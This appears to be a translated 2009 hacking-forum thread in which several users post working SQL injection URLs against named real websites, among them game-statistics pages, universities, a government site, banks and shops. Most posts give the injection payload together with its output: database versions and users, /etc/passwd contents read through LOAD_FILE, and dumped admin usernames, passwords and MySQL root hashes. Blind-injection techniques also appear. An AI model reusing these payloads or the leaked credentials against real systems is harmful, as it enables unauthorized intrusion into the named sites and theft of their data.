http://nlcgaming.aj-services.com/themes/bismarck/gamestat.php?gameID=-1+union+select+LOAD_FILE(0x2F6574632F706173737764) ,2&config=cfg-default.php
/etc/passwd
http://www.cumberlandcollege.sk.ca/Slaterz/codstats/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),ve rsion()),2&config=cfg-default.php
user() : database() : version()
root@localhost : vsp : 5.0.27
http://www.cumberlandcollege.sk.ca/Slaterz/codstats/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+user,file_priv+from+mysql.user&config=cfg-default.php
file_priv=Y
http://www.cumberlandcollege.sk.ca/Slaterz/codstats/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+LOAD_FILE(0x2F6574632F706173737764) ,file_priv+from+mysql.user&config=cfg-default.php
/etc/passwd
http://railwhore.com/vsp/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),ve rsion()),2&config=cfg-default.php
user() : database() : version()
brianyo_grunge@216.157.132.2 : brianyo_vmstats : 4.0.2
http://www.slquake.com/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),ve rsion()),2&config=cfg-default.php
user() : database() : version()
dbo260613578@74.208.16.225:db260613578:4.0.27-max-
http://krautz.clanserver4u.de/vsp/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),ve rsion()),2&config=cfg-default.php
user() : database() : version()
db_59449_1@DE-FFM-WS-01.clanserver4u.de:ws_59449_1:5.0.51a-24-log
http://www.dailycod.com/vsp/cod2/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),ve rsion()),2&config=cfg-default.php
user() : database() : version()
vsp@localhost : vsp : 5.0.67-log
http://cybercubic.com/vsp/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),ve rsion()),2&config=cfg-default.php
user() : database() : version()
root@localhost : ccvsp : 5.0.27
http://cybercubic.com/vsp/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+user,file_priv+from+mysql.user&config=cfg-default.php
file_priv=Y
http://cybercubic.com/vsp/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+LOAD_FILE(0x2F6574632F706173737764) ,2&config=cfg-default.php
/etc/passwd
http://www.enolan.info/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),ve rsion()),2&config=cfg-default.php
user() : database() : version()
vsp_q3@biggs.dreamhost.com:q3db_3w:5.0.67-log
ГАВ
http://www.murrayky.gov/showevent.htm?ID=9012001+union+select+1,2,version( ),user(),5,6,7,8,9,10,11,12,13,14,15/*
Version: 5.0.24
Username: citybusiness@localhost
Dbname: citybusiness
http://www.maket.eu/products.php?product_id=-56+union+select+1,2,concat_ws(0x3a,version(),datab ase(),useR()),4,5,6,7,8,9,10,11,12&id=3&start=5
Database Version: 5.0.67-community
Database name: maketeu_maket
User name: maketeu_site@localhost
mailbrush
26.03.2009, 14:53
All injections were checked with my Antiboyan (http://bestquest.info/php/check.php), then added to its database.
http://fpsgamer.jp/vsp/tourney2/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),ve rsion()),2&config=cfg-default.php
bsan@localhost:vsp:5.0.32-Debian_7etch6-log
http://fpsgamer.jp/vsp/tourney2/themes/bismarck/gamestat.php?gameID=-1+union+select+LOAD_FILE(0x2F6574632F706173737764) ,2&config=cfg-default.php
/etc/passwd
file_priv=Y
http://www.fragginrockets.org/vsp/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),ve rsion()),2&config=cfg-default.php
oopsie_vsp@localhost:oopsie_vsp:5.0.45
http://stats.etbunker.com/vsp/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),ve rsion()),2&config=cfg-default.php
etbunker_forums@localhost:etbunker_vspstats:4.1.22-standard
http://cod.wck.biz/stats/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),ve rsion()),2&config=cfg-default.php
root@localhost:codstats2:5.0.32-Debian_7etch8-log
http://cod.wck.biz/stats/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+LOAD_FILE(0x2F6574632F706173737764) ,2&config=cfg-default.php
/etc/passwd
file_priv=Y
http://www.teamnachtjager.net/vsp/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),ve rsion()),2&config=cfg-default.php
quake3@localhost:vsp_bq3:5.0.45
http://biohazard.moyse.net/vsp/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),ve rsion()),2&config=cfg-default.php
root@localhost:biohazard_stats:5.0.32-Debian_7etch8-log
http://biohazard.moyse.net/vsp/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+LOAD_FILE(0x2F6574632F706173737764) ,2&config=cfg-default.php
/etc/passwd
file_priv=Y
http://q3stats.siberianet.ru/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),ve rsion()),2&config=cfg-default.php
q3@89.105.136.130:q3:5.0.77-log
http://www.4fclan.com/VSP/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),ve rsion()),2&config=cfg-default.php
nruclan_svstats@localhost:nruclan_4Fstats:4.1.22-standard-log
http://www.awe-clan.com/vsp3/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),ve rsion()),2&config=cfg-default.php
aweclanc_neilemm@localhost:aweclanc_stats3:5.0.75-community-log
http://dmpstats.rko.nu/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),ve rsion()),2&config=cfg-default.php
dmpstats@77.232.80.111:dmpstats:5.0.67
http://stats.s4ndmod.com/aoastats/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),ve rsion()),2&config=cfg-default.php
headshotsniping@64.202.166.233:headshotsniping:4.0
M.W.N.N.
26.03.2009, 15:03
http://www.itoamerica.com/index.php?section=pdf&id=325+union+select+version(),2,3,4+limit+1,1/*
version():4.1.20
database():itoamerica
user():root@localhost
http://www.priderentals-bg.com/priderentals/property_info.php?idproperty=-55+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31, 32,33,34,35,36,37,38,39,40,41,42,concat_ws(0x3a,ve rsion(),database(),user())
Database Version: 5.0.67-community
Database name: pridebg_pride
User name: pridebg_pridebg@localhost
mailbrush
26.03.2009, 15:24
All injections were checked with my (and yours too) Antiboyan (http://bestquest.info/php/check.php), then added to its database.
http://xinul.org/vsp/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),ve rsion()),2&config=cfg-default.php
vsp-stat@localhost:vspstat:5.0.32-Debian_7etch8-log
http://montekidlo.org.ua/stat/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),ve rsion()),2&config=cfg-default.php
root@localhost:vsp:5.0.51a
http://montekidlo.org.ua/stat/themes/bismarck/gamestat.php?gameID=-1+union+select+LOAD_FILE(0x2F6574632F706173737764) ,2&config=cfg-default.php
/etc/passwd
file_priv=Y
http://www.etozclan.com/stats/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),ve rsion()),2&config=cfg-default.php
etozclan_stats@localhost:etozclan_vspstats:4.1.22-standard
http://games.zir.net/vsp/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),ve rsion()),2&config=cfg-default.php
ethost1@localhost:ethost1_vsp
http://www.fsk-clan.de/stats1/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),ve rsion()),2&config=cfg-default.php
chris@localhost:vsp1:5.0.24a-Debian_9ubuntu2-log
http://www.fsk-clan.de/stats1/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+LOAD_FILE(0x2F6574632F706173737764) ,2&config=cfg-default.php
/etc/passwd
file_priv=Y
http://www.3val.ru/games/cod2/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),ve rsion()),2&config=cfg-default.php
root@localhost:cod2stats:5.0.51b-community-nt-log
file_priv=N
M.W.N.N.
26.03.2009, 16:59
http://www.apsira.com/loans/bank.php?bankId=10+union+select+1,version(),3,4,5, 6,7,8,9,10,11,12,13,14+limit+1,1
version():5.0.75-community-log
database():jadianor_ap
user():jadianor_apsira@localhost
__
http://www.guardian-bank.com/webinfo.php?main=11+union+select+1,2/*
version():5.0.45
database():guardiankdb
user():guardianb#@localhost
http://www.guardian-bank.com/webinfo.php?main=11+union+select+1,2+from+users/*
__
http://www.arch-no.org/News.php?mode=read&id=271+union+select+1,2,3,4,concat(version(),0x3a, database(),0x3a,user()),6,7+limit+1,1/*
version():5.0.22-Debian_0ubuntu6.06.11-log
database():archno
user():archno@localhost
__
http://www.icallsofts.com/productdetails.php?id=12+union+select+1,concat(ver sion(),0x3a,database(),0x3a,user()),3,4,5,6,7,8/*
version():4.1.22-standard-log
database():ishgod_softwares
user():ishgod_softwares@66.40.52.25
__
http://www.ideas-bank.ru/trening.php?id=61+union+select+1,2,3,4,5,6,7,8,9,1 0,11+limit+1,1/*
__
http://www.7days.ae/storydetails.php?id=75189%27+union+select+1,concat (version(),0x3a,database(),0x3a,user()),3,4,5,6,7, 8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+l imit+1,1/*
version(): 5.0.45
database():sevendaysdb
user():sevendaysdb@localhost
Blind SQL, ebscohost.com PR=9
!
http://www.ebscohost.com/customerSuccess/default.php?id=253+and+substring(@@version,1,1)=4 ===> False
http://www.ebscohost.com/customerSuccess/default.php?id=253+and+substring(@@version,1,1)=5 ===> True
not a repost
spherics
26.03.2009, 17:11
http://www.ctl.mnscu.edu/events/cfp/RSPsessiondetail.php?id=98098765046+union+select+c oncat_ws(0x3a,version(),user(),database()),2,3,4,5 ,6,7,8,9,10,11,12--&confID=152
Database Version: 5.0.21
Database name: ctl_events
User name: ctl_RSP@hera.mnscu.edu
www.loria.fr PR - 7
http://intoweb.loria.fr/ProtosRecherche/IntoBib/AfficheDocument.php?Id=2809809700+union+select+con cat_ws(0x3a,version(),user(),database()),2--
Database Version: 4.0.14
Database name: WebStress
User name: root@raival.loria.fr
Reading etc/passwd
http://intoweb.loria.fr/ProtosRecherche/IntoBib/AfficheDocument.php?Id=2809809700+UNION+SELECT+CON CAT(0x3a,LOAD_FILE(0x2F6574632F706173737764),0x3a) ,2--
Reading /etc/issue
http://intoweb.loria.fr/ProtosRecherche/IntoBib/AfficheDocument.php?Id=2809809700+UNION+SELECT+CON CAT(0x3a,LOAD_FILE(0x2F6574632F6973737565),0x3a),2--
Mandrakelinux release 10.2 (Limited Edition 2005) for i586
Kernel 2.6.11-6mdk on an i686
mailbrush
26.03.2009, 18:06
TELO, take a look here: http://www.google.com/search?client=opera&rls=en&q=hardvision.ru+site:forum.antichat.ru&sourceid=opera&ie=utf-8&oe=utf-8. See how many times SQL injections for this site have already been posted? And if you don't want to get a minus, be so kind as to check everything on Antiboyan (http://localhost.ua/sql/check.php). I didn't create it for nothing.
http://valksfun.nl/vsp/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),ve rsion()),2&config=cfg-default.php
valksfun@localhost:valksfun_main:4.1.21-standard
http://proxy.doomwarriors.de/27961/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),ve rsion()),2&config=cfg-default.php
vsp@localhost:vsp:5.0.27
http://ext.kubnet.lnetw.ru/q3a/stats/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),ve rsion()),2&config=cfg-default.php
vsp@localhost:vsp:5.0.51a-log
http://www.dev1ance.net/desire/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),ve rsion()),2&config=cfg-default.php
root@localhost:vspfreeze:4.0.24-standard
http://www.dev1ance.net/desire/themes/bismarck/gamestat.php?gameID=-1+union+select+LOAD_FILE(0x2F6574632F706173737764) ,2&config=cfg-default.php
/etc/passwd
file_priv=Y
http://cs.uch.net/q3stat/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),ve rsion()),2&config=cfg-default.php
cs16@localhost:q3:5.1.30
http://urt.voxel.net/stats/ffa/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),ve rsion()),2&config=cfg-default.php
ffa@localhost:ffa:5.0.45
http://urt.voxel.net/stats/ffa/themes/bismarck/gamestat.php?gameID=-1+union+select+LOAD_FILE(0x2F6574632F706173737764) ,2&config=cfg-default.php
/etc/passwd
file_priv=Y
http://quake.academ.org/vsp/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),ve rsion()),2&config=cfg-default.php
quake@85.118.224.19:q3_stats_vsp:5.0.32-Debian_7etch5-log
http://miguel-lopez.com/vsp/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),ve rsion()),2&config=cfg-default.php
mmarti1_vspuser@216.157.150.128:mmarti1_vsp:4.0.26
http://vsp.goodguysclan.net/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),ve rsion()),2&config=cfg-default.php
goodguys@localhost:goodguys:5.0.32-Debian_7etch6
http://tacticalinstinct.com/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),ve rsion()),2&config=cfg-default.php
TacticalInstinct@localhost:TacticalInstinctScore:5 .0.22-Debian_0ubuntu6.06.6-log
http://www.brainyminds.com/client.php?id=-3/**/UNION/**/SELECT/**/1,2,3,4,5,6,7/**//*
Database Version: 4.1.20
Database name: ssmith_bm
User name: ssmith_brainy@localhost
http://www.nlpplanning.com/client.php?id=-8/**/UNION/**/SELECT/**/1,2/**/l/*
Database Version: 4.0.30-log
Database name: u10001284
User name: u10001284@lon1-webmysql-1.msh.demon.net
http://www.hosse.bg/bg/materials_details.php?id_d=228+AND+ASCII(SUBSTRING ((select+y=1..3()),1,1))=x=1..3-- &vid=0
y1=version
y2=database
y3=user
x1=53,46,48,46,54,55,45,99,111,109,109,117,110,105 ,116,121
x2=104,111,115,115,101,98,103,95,72,111,115,115,10 1
x3=104,111,115,115,101,98,103,95,115,105,116,101,6 4,108,111,99,97,108,104,111,115,116
Version : 5.0.67-community
Database : hossebg_Hosse
User : hossebg_site@localhost
http://lighthouse-bg.com/en/news_details.php?id=12+AND+ASCII(SUBSTRING((select +y=1..3() ),1,1))=x=1..3
x1=52,46,49,46,50,50,45,108,111,103
x2=76,105,103,104,116,72,111,117,115,101
x3=108,105,103,104,116,104,111,117,115,101,95,115, 105,116,101,64,108,111,99,97,108,104,111,115,116
Version : 4.1.22-log
Database : LightHouse
User : lighthouse_site@localhost
spherics
26.03.2009, 20:13
http://www.img.ufl.edu/php/project.php?id=798798756554343+union+select+1,2,co ncat_ws(0x3a,version(),user(),database()),4,5,6,7, 8,9,10,11--
Database Version: 5.0.27
Database name: img
User name: img_www@localhost
http://www.img.ufl.edu/php/project.php?id=798798756554343+UNION+SELECT+1,2,AE S_DECRYPT(AES_ENCRYPT(CONCAT(0x3a,(SELECT+CONCAT(e mail,0x3a,username,0x3a,password)+FROM+img.alumni+ LIMIT+10,1),0x3a),0x71),0x71),4,5,6,7,8,9,10,11--
email : username : password
PR - 4
http://www.hillbilly-music.com/artists/story/index.php?id=13495/**/union/**/select/**/1,2,3,4,5,concat_ws(0x3a,version(),user(),database ()),7/*
Version: 4.0.21
User: cowboy54@38.113.244.81
Database: cowboy54
PageRank = 5
http://slought.org/toc/archives/display4.php?id=10168768754384+union+select+1,2,3, 4,5,6,7,concat_ws(0x3a,version(),user(),database() ),9,10,11,12,13,1,15,16,17,18,19,20,21,22,23,24,25 ,26,27,28,29--
Version: 4.0.27-log
User: slough@localhost
Database: slough
http://www.collectionauto.ru/index.php?menu=-7+union+select+1,2,concat_ws(0x3a,version(),databa se(),user()),4,5,6,7,8,9--
Database Version: 5.0.67-community
Database name: sonnec_auto
User name: sonnec_sunex@localhost
DrAssault
26.03.2009, 20:18
http://www.dropball.ru/news.php?type=1&id=1371%20union%20select%201,2,3,4,5,6,7,8,9,10,11 ,12,unhex(hex(concat(U_Username,0x3a,U_Password))) ,14,15,16,17,18,19,20,21%20from%20w3t_Users%20limi t%2089,1+--+
Output appears in the page title...
http://www.inacif.gob.gt/index.php?showPage=125&nwid=-7'+union+select+1,2,version(),4,5,6,load_file('/etc/passwd'),8,9,10/*
Version: 4.0.26
Database: inacif_gob_gt
User: inacif@localhost
http://www.baltimoretechnologypark.com/index.php?showPage=152&nwid=-58'+union+select+1,2,3,load_file('/etc/passwd'),5,6,7,8,9,10,11/*
Version: 4.0.26
Database: baltimoretechnologypark_com
User: btpark@localhost
Online store
http://avb.com.ua/show_tovar.php?id=-352334 union select 1,2,3,login,5,password,7,8,9,10,11 FROM raznoe --
admin :: pass
administrator :: price
M.W.N.N.
27.03.2009, 01:51
http://new-list.com/recommend.php?id=9822+union+select+1,2,concat(vers ion(),0x3a,database(),0x3a,user()),4,5,6,7,8,9,10, 11,12,13+limit+1,1/*
version():5.0.22-log
database():newlist_articles
user():newlist@localhost
__
http://www.accesat.be/index.php?view=info&id=733%27+union+select+1,2,3,4,5,6,7,8,9,10,11,con cat(version(),0x3a,database(),0x3a,user()),13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql.u ser+limit+1,1/*
version():5.0.32-Debian_7etch8-log
database():accesat
user():root@localhost
http://www.accesat.be/index.php?view=info&id=733%27+union+select+1,2,3,4,5,6,7,8,9,10,concat (user,0x3a,password),12,13,14,15,16,17,18,19,20,21 ,22,23,24,25,26,27+from+mysql.user+limit+1,1/*
root:*5D56577929EBE57FA00A78DCEC07B00F70FE86C9
http://www.accesat.be/index.php?view=info&id=733%27+union+select+1,2,3,4,5,6,7,8,9,10,load_f ile(%27/etc/passwd%27),12,13,14,15,16,17,18,19,20,21,22,23,24, 25,26,27+limit+1,1/*
__
http://www.bcd-fed.be/events.php?action=info&id=36%27+union+select+1,2,3,4,concat(version(),0x3 a,database(),0x3a,user()),6+limit+1,1/*
version():5.0.18-nt
database():bcd-fed
user():bcd-fed003@localhost
__
http://www.dereserven.be/index.php?menu=Ploeg&pag=Info&id=55+union+select+1,concat(version(),0x3a,databas e(),0x3a,user()),3,4,5,6,7,8,9,10,11,12,13,14,15,1 6,17,18/*
version():4.1.22-standard-log
database():wsouden_start
user():wsouden_wsouden@localhost
завтрак
http://www.communityservice.wustl.edu/groups/printout.php?gid=-64'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 ,32,33,34,35,36,37/*
User: commserv@localhost
Version: 4.0.14-max
Dbname: commserv
news
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.lib.byu.edu/subsutility/viewGuide.php?gid=-364+union+select+1,version()--
Dbname: byudbs
Username: byudbs@web1.lib.byu.edu
Version: 5.0.26-log
http://www.karcherbg.com/newsview.php?id=-21+union+select+1,concat_ws(0x3a,version(),databas e(),useR()),3,4,5,6
Database Version: 5.0.67-community
Database name: karcherb_karcher
User name: karcherb_site@localhost
http://www.nmkconsult.com/services_details.php?id=-3+union+select+1,concat_ws(0x3a,version(),database (),useR()),3,4,5
Database Version: 5.0.67-community
Database name: nmkconsu_NMKCONSULT
User name: nmkconsu_site@localhost
An interesting case: since the site had no dynamic parameter like id=, I found the news tab, but there was only a single news item there, so it looked like just news.php. I substituted news.php?id=1 and from there worked the SQL injection the classic way.
http://www.ekip6.net/bg/news.php?id=-1+union+select+1,concat_ws(0x3a,version(),database (),useR()),3,4,5,6,7,8,9
Database Version: 5.0.67-community-log
Database name: ekip6ne_Ekip6
User name: ekip6ne_site@localhost
mailbrush
27.03.2009, 14:50
http://www.harryhomers.co.uk/et/stats/hhs/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),ve rsion()),2&config=cfg-default.php
harry_headsh@localhost:harry_statshhs:5.0.67-community
http://whetstats.sonyonline.de/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),ve rsion()),2&config=cfg-default.php
U480002@jenkins.stor:DB480002:5.0.67-log
http://lapdclan.eu/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),ve rsion()),2&config=cfg-default.php
lapdceba@localhost:usrdb_lapdceba_stats:5.0.51a
http://pro-q3dm6.de/27962/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),ve rsion()),2&config=cfg-default.php
vsp@localhost:vsp:5.0.27
http://theaodclan.com/vsp/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),ve rsion()),2&config=cfg-default.php
theaod_vspuser@localhost:theaod_vsp:5.0.67-community
http://www.wolfet.fr/vsp/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),ve rsion()),2&config=cfg-default.php
vsp-stat@localhost:vspstat:5.0.32-Debian_7etch8-log
http://vsp.creativehosting.nl/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),ve rsion()),2&config=cfg-default.php
vsp@c1n1.86id.nl:vsp:5.0.32-Debian_7etch6-log
http://afterhourgamers.com/stats/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),ve rsion()),2&config=cfg-default.php
ahgamers_stats@localhost:ahgamers_stats:5.0.67-community
http://www.exiledunit.com/stats/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),ve rsion()),2&config=cfg-default.php
exiledun_stats@localhost:exiledun_stats:4.1.22-standard
site: kdvorik.ru
http://www.kdvorik.ru/katalog.php?r=-0+union+select+1,2,3,4,5,concat_ws(0x3a,name,email )+from+users--
database: 4.0.27-max-log
name_database: dvorik
user: dvorik@v46.valuehost.ru
http://www.kdvorik.ru/admin
column: users
log: asvitov
pass: :(
email: asvitov@avallon.ru
DrAssault
27.03.2009, 15:55
http://www.l-oko.ru/goonline.php?id=-1%27+union+select+1,2,concat_ws(0x3a,user_id,usern ame,user_password),4,5,6,7,8+from+phpbb_users+limi t+1,1+--+
http://www.tamaltd.com/bg/products.php?gr=-5+union+select+1,concat_ws(0x3a,version(),database (),useR()),3,4,5,6,7,8
Database Version: 4.1.20
Database name: tamaltd
User name: tamaltd@localhost
http://www.farin.bg/medcontent.php?pub=n&med=-5+union+select+1,concat_ws(0x3a,version(),database (),useR())
Database Version: 5.0.32-Debian_7etch5-log
Database name: wdbn
User name: mrtn@localhost
DrAssault
27.03.2009, 16:52
http://www.crossroadsdg.com/news_more.php?id=1+union+select+1,concat_ws(0x3a3a 3a,id,username,password),3,4+from+users+--+
Output: 3:::admin:::6692e9c358a3031d
http://www.interay.eu/bg/product.php?brand=in_the_store&id=-9+union+select+1,concat_ws(0x3a,version(),database (),useR()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33
Database Version: 5.0.67-community
Database name: interay_interay
User name: interay_site@localhost
http://www.briz-bulgarian-properties.bg/en/property_details.php?id=-247+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,con cat_ws(0x3a,version(),database(),useR()),15,16,17, 18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 ,35,36,37,38,39
Database Version: 5.0.67-community
Database name: brizbg_BRIZ
User name: brizbg_site@localhost
DrAssault
27.03.2009, 17:06
http://www.wirelessgalaxy.com/headsets/productdetails.asp?productid=1+having+1=1--
Output: tblProducts.ProductID
http://www.wirelessgalaxy.com/headsets/productdetails.asp?productid=1+group+by+tblProduct s.ProductID+having+1=1--
Output: tblProducts.ProductNam
http://www.wirelessgalaxy.com/headsets/productdetails.asp?productid=1+group+by+tblProduct s.ProductID, tblProducts.ProductName+having+1=1--
Output: tblProducts.PartNo
http://www.rollco-bg.com/en/news_pop_en.php?id=-8+union+select+1,2,3,4,5,6,concat_ws(0x3a,version( ),database(),useR())
Database Version: 4.1.22
Database name: webrollco
User name: webrollco@webserv
http://www.longman-bulgaria.com/product.php?id=-137+union+select+1,2,3,concat_ws(0x3a,version(),da tabase(),useR()),5,6,7,8,9,10,11,12,13
Database Version: 5.0.67-community
Database name: longman_longman
User name: longman_site@localhost
M.W.N.N.
27.03.2009, 17:48
http://www.avnet.kuleuven.be/catalogus/showArticle.php?id=122+union+select+1,concat(versi on(),0x3a,database(),0x3a,user()),3,4,5,6,7,8,9,10 ,11,12,13,14,15,16++from+mysql.user+limit+1,1/*
version():4.1.22-log
database():avnetweb
user():AVNetWEBuser@localhost
http://www.avnet.kuleuven.be/catalogus/showArticle.php?id=122+union+select+concat(user,0x 3a,password),concat(version(),0x3a,database(),0x3a ,user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16++from+ mysql.user+limit+1,1/*
root:58ca972b03220752
DrAssault
27.03.2009, 17:58
http://www.swstechnology.com/equipment_product.php?ID=-1'+union+select+1,concat_ws(0x3a,ID,Username,Passw ord),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,2 0+from+adminuser+--+
1:admin:24906u5j
http://www.adonay.bg/ru/galery_pop.php?id=-37+union+select+1,2,concat_ws(0x3a,version(),datab ase(),useR()),4,5,6
Database Version: 5.0.67-community
Database name: adonayb_Adiabat
User name: adonayb_site@localhost
http://www.cartel-sa.com/en/news_details.php?id=-2+union+select+1,2,concat_ws(0x3a,version(),databa se(),useR()),4,5,6,7,8
Database Version: 5.0.67-community
Database name: cartelsa_cartel
User name: cartelsa_site@localhost
http://www.dmsbg.com/projects_details_actual.php?id=-89+union+select+1,concat_ws(0x3a,version(),databas e(),useR()),3,4,5,6,7,8,9,10,11&start=0
Database Version: 4.0.27-log
Database name: DMS
User name: dmsbg@localhost
http://www.atlanticgamma.com/en/presentation.php?id=-12+union+select+1,,3,4,5,6,7,8
Database Version: 5.0.67-community
Database name: atlantic_Atlantic
User name: atlantic_site@localhost
http://www.pixel.bg/portfolio_details.php?dejnost=4&id=-27+union+select+1,concat_ws(0x3a,version(),databas e(),useR()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17, 18
Database Version: 5.0.67-community
Database name: pixelb_Pixel
User name: pixelb_site@localhost
http://www.atriumbulgarianrealestate.com/property_details.php?id=-492+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 ,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,4 8,49,50,51,52,53,54,55,56,57,58,concat_ws(0x3a,ver sion(),database(),useR()),60,61
Database Version: 5.0.67-community
Database name: atriumbu_Atrium
User name: atriumbu_site@localhost
http://www.restaurant.bg/designs/inox2_en.php?id=-4192+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,3 1,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47, 48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64 ,65,concat_ws(0x3a,version(),database(),useR()),67 ,68,69,70
Database Version: 5.0.67-community
Database name: restaura_restaurant
User name: restaura_site@localhost
http://www.bar.bg/designs/inox2_en.php?id=-301+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 ,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,4 8,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64, 65,concat_ws(0x3a,version(),database(),useR()),67, 68,69,70
Database Version: 5.0.67-community
Database name: barbg_bar
User name: barbg_site@localhost
http://www.real-estates.bg/en/property_details.php?id=-8+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,3 2,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48, 49,50,51,52,53,54,55,56,57,58,concat_ws(0x3a,versi on(),database(),useR()),60
Database Version: 5.0.67-community
Database name: maxbgbg_MaxBG
User name: maxbgbg_site@localhost
http://www.bulgarianrealestates.bg/en/property_details.php?id=-8+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,3 2,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48, 49,50,51,52,53,54,55,56,57,58,concat_ws(0x3a,versi on(),database(),useR()),60
Database Version: 5.0.67-community
Database name: maxbgbg_MaxBG
User name: maxbgbg_site@localhost
http://www.maxbg.bg/en/property_details.php?id=-7+union+select+1,2,concat_ws(0x3a,version(),databa se(),useR()),4,5,6,7
Database Version: 5.0.67-community
Database name: maxbgbg_MaxBG
User name: maxbgbg_site@localhost
and here is the site of the company that built all these sites
http://www.lemon.bg/news_details.php?id=28+and+substring((select+y=1.. 3() ),1,1)>x
y1=version
y2=database
y3=user
x1=53,46,48,46,54,55,45,99,111,109,109,117,110,105 ,116,121
x2=108,101,109,111,110,98,103,95,76,101,109,111,11 0
x3=108,101,109,111,110,98,103,95,115,105,116,101,6 4,108,111,99,97,108,104,111,115,116
Version :5.0.67-community
Database : lemonbg_Lemon
User : lemonbg_site@localhost
